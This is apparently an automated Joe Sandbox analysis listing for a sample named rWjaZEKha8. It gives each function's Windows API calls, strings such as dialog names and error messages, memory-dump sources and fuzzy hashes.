                  • Opcode Fuzzy Hash: d76bc38bfb126cb4b8acfb26ce4b34145b215cea07ff734e07bf971f5dbd09fa
                  • Instruction Fuzzy Hash: D721933244020CAADF21DEA4DC06FEE7BB8EF15700F048512FE1896192D771DA56DB51
                  Function 0018A990 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0017130B: GetDlgItem.USER32(00000000,00003021), ref: 0017134F
                    • Part of subcall function 0017130B: SetWindowTextW.USER32(00000000,001A35B4), ref: 00171365
                  • EndDialog.USER32(?,00000001), ref: 0018A9DE
                  • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0018A9F6
                  • SetDlgItemTextW.USER32(?,00000067,?), ref: 0018AA24
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ItemText$DialogWindow
                  • String ID: GETPASSWORD1
                  • API String ID: 445417207-3292211884
                  • Opcode ID: 0c2a22f098091874e88fe51639588217cd203c61662a16a130d72674823a53f1
                  • Instruction ID: 3fb7449edbf84bbb04392e6d8096f15fb1144e7e79d07bcfeb17510f0533b99e
                  • Opcode Fuzzy Hash: 0c2a22f098091874e88fe51639588217cd203c61662a16a130d72674823a53f1
                  • Instruction Fuzzy Hash: 641125329441287BEB25AA649E09FFA377CEF59300F010013FA49B3480C3B09A91DBA2
                  Function 0017B4F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                  Download Yara Rule
                  APIs
                  • _swprintf.LIBCMT ref: 0017B51E
                    • Part of subcall function 0017400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0017401D
                  • _wcschr.LIBVCRUNTIME ref: 0017B53C
                  • _wcschr.LIBVCRUNTIME ref: 0017B54C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: _wcschr$__vswprintf_c_l_swprintf
                  • String ID: %c:\
                  • API String ID: 525462905-3142399695
                  • Opcode ID: a8fca7d09e8a13f6042aee5b2d67f1f7f47143c37847d83187bb4dccec4435b4
                  • Instruction ID: c56310d135dcb01d6065960dcf49499638ab8ae371f92a2c7ef4819f5b76480a
                  • Opcode Fuzzy Hash: a8fca7d09e8a13f6042aee5b2d67f1f7f47143c37847d83187bb4dccec4435b4
                  • Instruction Fuzzy Hash: B5012D53908311BADB206B759CC6E6BB7BCDEA6760751C416F84DC6081FB30D950C3B1
                  Function 001806BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON
                  Download Yara Rule
                  APIs
                  • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0017ABC5,00000008,?,00000000,?,0017CB88,?,00000000), ref: 001806F3
                  • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0017ABC5,00000008,?,00000000,?,0017CB88,?,00000000), ref: 001806FD
                  • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0017ABC5,00000008,?,00000000,?,0017CB88,?,00000000), ref: 0018070D
                  Strings
                  • Thread pool initialization failed., xrefs: 00180725
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                  • String ID: Thread pool initialization failed.
                  • API String ID: 3340455307-2182114853
                  • Opcode ID: 0a6a9751f53ec69258aea43402a637d0d6d72f77086439aaae60c793487fc074
                  • Instruction ID: ed3abd31250710eae97a242c2ebf82284b896e4c1723c023111d1251d5215e58
                  • Opcode Fuzzy Hash: 0a6a9751f53ec69258aea43402a637d0d6d72f77086439aaae60c793487fc074
                  • Instruction Fuzzy Hash: AA1186B1500709AFD3316F65DC84AA7FBECEB99754F20482EF1DA82200D7716A84CF60
                  Function 0018D38B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID: RENAMEDLG$REPLACEFILEDLG
                  • API String ID: 0-56093855
                  • Opcode ID: 8d8a247d8a3110e90c4cefe345bd8f37e89d2a9c2764455e64a27e0b93b17a2a
                  • Instruction ID: cc68f71bbecbb8d8256fcd384d816081c8e6d26ba4cd13d77ed2affc72d824b1
                  • Opcode Fuzzy Hash: 8d8a247d8a3110e90c4cefe345bd8f37e89d2a9c2764455e64a27e0b93b17a2a
                  • Instruction Fuzzy Hash: 4601B171600345AFCB12AF28FD44F9A7FA9F719790B004521F805D2A70C771D990EFA1
                  Function 001991DE Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: __alldvrm$_strrchr
                  • String ID:
                  • API String ID: 1036877536-0
                  • Opcode ID: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                  • Instruction ID: 5a77dad4412f8b247a4a7b83a705d22cdb40707b072fa1597223a070dae31653
                  • Opcode Fuzzy Hash: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                  • Instruction Fuzzy Hash: 95A147719043869FEF26CF6CC8917AEBBE5FF66310F18416DE8859B281C3389A42C751
                  Function 0017A2AB Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,001780B7,?,?,?), ref: 0017A351
                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,001780B7,?,?), ref: 0017A395
                  • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,001780B7,?,?,?,?,?,?,?,?), ref: 0017A416
                  • CloseHandle.KERNEL32(?,?,00000000,?,001780B7,?,?,?,?,?,?,?,?,?,?,?), ref: 0017A41D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: File$Create$CloseHandleTime
                  • String ID:
                  • API String ID: 2287278272-0
                  • Opcode ID: cab62f5778bcd7b8fafbabf4edeb9226a83237433ee8735f7157325ff87508dc
                  • Instruction ID: a0d9db2ad11850a94ccccab5d30b41dd0ed69a15d2eadccc5cebb0794f915945
                  • Opcode Fuzzy Hash: cab62f5778bcd7b8fafbabf4edeb9226a83237433ee8735f7157325ff87508dc
                  • Instruction Fuzzy Hash: 6541DD30288384AAE731DF24CC45BAFBBE8AFD5700F48891CB5D993181D7649A48DB53
                  Function 0019C099 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,001989AD,?,00000000,?,00000001,?,?,00000001,001989AD,?), ref: 0019C0E6
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0019C16F
                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001967E2,?), ref: 0019C181
                  • __freea.LIBCMT ref: 0019C18A
                    • Part of subcall function 00198518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0019C13D,00000000,?,001967E2,?,00000008,?,001989AD,?,?,?), ref: 0019854A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                  • String ID:
                  • API String ID: 2652629310-0
                  • Opcode ID: e96d5cc4e0d902129281218bd2d226cfea6e8f062bdc2c324ea95f6ccd7ebc86
                  • Instruction ID: 68a84bdbb19fbc081737e5838a66cab81e23dafbf427d45ab77b20193978a449
                  • Opcode Fuzzy Hash: e96d5cc4e0d902129281218bd2d226cfea6e8f062bdc2c324ea95f6ccd7ebc86
                  • Instruction Fuzzy Hash: 1731BA72A0020AEBDF289F64DC85EAE7BA5EB45710F090128FC1496291EB35CD90CBE0
                  Function 00192503 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • ___BuildCatchObject.LIBVCRUNTIME ref: 0019251A
                    • Part of subcall function 00192B52: ___AdjustPointer.LIBCMT ref: 00192B9C
                  • _UnwindNestedFrames.LIBCMT ref: 00192531
                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 00192543
                  • CallCatchBlock.LIBVCRUNTIME ref: 00192567
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                  • String ID:
                  • API String ID: 2633735394-0
                  • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                  • Instruction ID: 584fa154c5145331fd61c58b440a4e7612df1dae51a75085d2b518f0bcc77566
                  • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                  • Instruction Fuzzy Hash: 2E01D332000109BBDF12AF65DC41EDA3BBAEF69754F168418F91866120C376E962EFA1
                  Function 00189DBB Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                  Download Yara Rule
                  APIs
                  • GetDC.USER32(00000000), ref: 00189DBE
                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00189DCD
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00189DDB
                  • ReleaseDC.USER32(00000000,00000000), ref: 00189DE9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: CapsDevice$Release
                  • String ID:
                  • API String ID: 1035833867-0
                  • Opcode ID: 7a24255cc18a994a5ac4e74e44c1a350c56d307e7da467a9176e0e916b0abfe3
                  • Instruction ID: 4e029e10542126a92403bf7171447e15f4e1b3348321a9d39abeaa598f0edbf7
                  • Opcode Fuzzy Hash: 7a24255cc18a994a5ac4e74e44c1a350c56d307e7da467a9176e0e916b0abfe3
                  • Instruction Fuzzy Hash: CCE0EC32987621A7D3201BA4AC0DB9B3B58AB19B12F054106F61596594DB704485CF94
                  Function 00192016 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                  Download Yara Rule
                  APIs
                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00192016
                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0019201B
                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00192020
                    • Part of subcall function 0019310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0019311F
                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00192035
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                  • String ID:
                  • API String ID: 1761009282-0
                  • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                  • Instruction ID: a138913f4fbebeecafeaf6f02aaf60ebd2674900f764612dd380cc97c1323e01
                  • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                  • Instruction Fuzzy Hash: 38C04824104640F41C223AB222022BE0B401C73BC4B9B60E2F8A017113EF260B1AE033
                  Function 00189F5D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00189DF1: GetDC.USER32(00000000), ref: 00189DF5
                    • Part of subcall function 00189DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00189E00
                    • Part of subcall function 00189DF1: ReleaseDC.USER32(00000000,00000000), ref: 00189E0B
                  • GetObjectW.GDI32(?,00000018,?), ref: 00189F8D
                    • Part of subcall function 0018A1E5: GetDC.USER32(00000000), ref: 0018A1EE
                    • Part of subcall function 0018A1E5: GetObjectW.GDI32(?,00000018,?), ref: 0018A21D
                    • Part of subcall function 0018A1E5: ReleaseDC.USER32(00000000,?), ref: 0018A2B5
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ObjectRelease$CapsDevice
                  • String ID: (
                  • API String ID: 1061551593-3887548279
                  • Opcode ID: 5e59aa42ad1f12e36099fc6b9d072e55722ebdd2694fde76152ac750e5439e2d
                  • Instruction ID: 0e875e474e003f4b93b60d5a6029c090a09878deefde3ae17c6659ce22b9fc37
                  • Opcode Fuzzy Hash: 5e59aa42ad1f12e36099fc6b9d072e55722ebdd2694fde76152ac750e5439e2d
                  • Instruction Fuzzy Hash: 6F811471208214AFD714DF68C844A6ABBE9FF89704F00491EF99AD7260DB31AE05DF62
                  Function 00180E37 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: _swprintf
                  • String ID: %ls$%s: %s
                  • API String ID: 589789837-2259941744
                  • Opcode ID: bb45b8118e6d2206925fa307b7b9800b28b6c0167284bb02c19659b154b2e430
                  • Instruction ID: c0cb951597102244306dbeaa1015f8e26aa8bc08e238873b22da3bc23c7322b9
                  • Opcode Fuzzy Hash: bb45b8118e6d2206925fa307b7b9800b28b6c0167284bb02c19659b154b2e430
                  • Instruction Fuzzy Hash: 5E51CB3214C708FAFA7636A4DC43F377569AB1CB00F228907B39A644D5C79157D46F12
                  Function 0017772B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 00177730
                  • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001778CC
                    • Part of subcall function 0017A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0017A27A,?,?,?,0017A113,?,00000001,00000000,?,?), ref: 0017A458
                    • Part of subcall function 0017A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0017A27A,?,?,?,0017A113,?,00000001,00000000,?,?), ref: 0017A489
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: File$Attributes$H_prologTime
                  • String ID: :
                  • API String ID: 1861295151-336475711
                  • Opcode ID: 4f485e2e7b208d59cc1614a7bcdfa1700c537408109133fcba8715521883edd8
                  • Instruction ID: 69c706830b39d107dfa05ff10c2e37e2c6ee1d1df572f869bc0d2e2e6fb01fc6
                  • Opcode Fuzzy Hash: 4f485e2e7b208d59cc1614a7bcdfa1700c537408109133fcba8715521883edd8
                  • Instruction Fuzzy Hash: EB417471804258AADB24EB50DD59EEEB37CAF55300F00C1DAB60DA3092EB745F88DF61
                  Function 0017B66C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID: UNC$\\?\
                  • API String ID: 0-253988292
                  • Opcode ID: 86397e694c92b03ded10ea979de99f9067d104fe59255d2c3cc971e4adc32f2a
                  • Instruction ID: 41e73237443dc404444373532fdaf4d111b2ab451db7bf99cd429a42f8d06cfd
                  • Opcode Fuzzy Hash: 86397e694c92b03ded10ea979de99f9067d104fe59255d2c3cc971e4adc32f2a
                  • Instruction Fuzzy Hash: 26419235848219AACF24AF21DCC1FEF77B9AF55750F11C029F81CA7192EB70DA41CA60
                  Function 00188FB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID: Shell.Explorer$about:blank
                  • API String ID: 0-874089819
                  • Opcode ID: 24bdc46ff6598abbb6081a90d721244b5e48485a06fc2336abe611f7de30d3b7
                  • Instruction ID: 83a0a454d9d8e61c62e1188df45d68ed75d85b1ae36cfe2b4b3d9f6455b86044
                  • Opcode Fuzzy Hash: 24bdc46ff6598abbb6081a90d721244b5e48485a06fc2336abe611f7de30d3b7
                  • Instruction Fuzzy Hash: 012180712043049FCB08AF64C895A7A77A9FF89711B18856EF9199F282DB70EE00CF60
                  Function 0017EBF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0017EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0017EB92
                    • Part of subcall function 0017EB73: GetProcAddress.KERNEL32(001B81C0,CryptUnprotectMemory), ref: 0017EBA2
                  • GetCurrentProcessId.KERNEL32(?,?,?,0017EBEC), ref: 0017EC84
                  Strings
                  • CryptProtectMemory failed, xrefs: 0017EC3B
                  • CryptUnprotectMemory failed, xrefs: 0017EC7C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
